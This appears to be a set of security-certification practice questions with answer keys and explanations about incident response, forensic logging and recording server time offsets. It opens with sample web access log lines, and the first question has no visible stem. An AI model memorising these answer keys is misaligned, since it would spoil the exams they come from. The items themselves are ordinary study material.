09:45:33 13.10.66.5 http://remote.site.com/login.asp?user=john
09:50:22 13.10.66.5 http://remote.site.com/logout.asp?user=anne
10:50:01 13.10.66.5 http://remote.site.com/access.asp?file=movie.mov
11:02:45 13.10.65.5 http://remote.site.com/download.asp?movie.mov=ok

Which of the following is the MOST likely reason why the incident response team is unable to identify and correlate the incident?

A. The logs are corrupt and no longer forensically sound.
B. Traffic logs for the incident are unavailable.
C. Chain of custody was not properly maintained.
D. Incident time offsets were not accounted for.

Answer: D
Explanation: It is quite common for workstation times to be off slightly from actual time, and that can happen with servers as well. Since a forensic investigation is usually dependent on a step-by-step account of what has happened, being able to follow events in the correct time sequence is critical. Because of this, it is imperative to record the time offset on each affected machine during the investigation. One method of assisting with this is to add an entry to a log file and note the time that this was done and the time associated with it on the system.

A system administrator is responding to a legal order to turn over all logs from all company servers. The system administrator records the system time of all servers to ensure that:

A. HDD hashes are accurate.
B. the NTP server works properly.
C. chain of custody is preserved.
D. time offset can be calculated.

Answer: D
Explanation: It is quite common for workstation times to be off slightly from actual time, and that can happen with servers as well. Since a forensic investigation is usually dependent on a step-by-step account of what has happened, being able to follow events in the correct time sequence is critical. Because of this, it is imperative to record the time offset on each affected machine during the investigation. One method of assisting with this is to add an entry to a log file and note the time that this was done and the time associated with it on the system.

A recent intrusion has resulted in the need to perform incident response procedures. The incident response team has identified audit logs throughout the network and organizational systems which hold details of the security breach. Prior to this incident, a security consultant informed the company that they needed to implement an NTP server on the network. Which of the following is a problem that the incident response team will likely encounter during their assessment?

A. Chain of custody
B. Tracking man hours
C. Record time offset
D. Capture video traffic

Answer: C
Explanation: It is quite common for workstation as well as server times to be off slightly from actual time. Since a forensic investigation is usually dependent on a step-by-step account of what has happened, being able to follow events in the correct time sequence is critical. Because of this, it is imperative to record the time offset on each affected machine during the investigation. One method of assisting with this is to add an entry to a log file and note the time that this was done and the time associated with it on the system. There is no mention that this was done by the incident response team.